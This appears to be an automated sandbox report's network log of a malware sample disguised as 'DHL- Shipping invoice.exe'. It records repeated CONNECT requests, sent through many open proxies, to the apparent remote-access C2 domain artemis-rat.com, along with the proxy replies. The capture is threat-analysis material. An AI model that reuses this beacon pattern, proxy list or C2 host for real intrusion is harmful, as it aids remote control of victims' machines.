                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1151192.168.2.451547188.132.222.5180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.872931004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.008457899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.047276020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.082483053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.131711960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.140456915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1152192.168.2.453405147.75.92.244100016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.873209000 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:04.139951944 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1153192.168.2.453539162.159.242.45806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.876132011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.964011908 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1154192.168.2.453343150.107.136.11080826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.883996964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1155192.168.2.45355131.43.179.160806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.884104013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.971163988 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1156192.168.2.45341393.171.220.22988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.890860081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1157192.168.2.45352712.176.231.147806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.890862942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.006648064 CET169INHTTP/1.0 400 Bad request
                            cache-control: no-cache
                            content-type: text/html
                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1158192.168.2.453556162.159.242.109806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.894614935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.982388973 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1159192.168.2.453485192.154.244.9290006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.898519039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1160192.168.2.452994195.35.29.39806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.952651978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.008784056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.047297001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.082556009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.131715059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.140924931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.156924963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:16.156033993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1161192.168.2.45340934.92.12.21092386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.953885078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.883156061 CET28INHTTP/1.1 502 Bad Gateway


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1162192.168.2.453496177.93.45.1569996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.954018116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.453138113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.047148943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.141021967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.204742908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.250489950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453325033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.602631092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.948730946 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1163192.168.2.45352438.54.101.25431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.957247019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.114746094 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1164192.168.2.451523183.88.212.18480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.957601070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.062256098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1165192.168.2.451554192.163.201.131101856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.957607985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.062546015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.063118935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.062943935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.062728882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.062300920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.062371016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:16.062341928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:04.062268972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1166192.168.2.453610104.16.230.163806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.958256960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.046076059 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1167192.168.2.45358938.162.20.13531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.958396912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.256138086 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1168192.168.2.45351294.131.14.6610816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.964442015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1169192.168.2.45354249.13.131.163806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.969526052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1170192.168.2.45224968.71.249.153486066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.971944094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1171192.168.2.453370103.83.252.6110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.972367048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1172192.168.2.451769194.4.50.94123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.972570896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1173192.168.2.45358023.161.96.132806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.972841024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.343746901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750273943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.590174913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.140845060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.683991909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:05.812695026 CET536INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:38:05 GMT
                            Server: Apache/2.4.57 (Debian)
                            Content-Length: 614
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
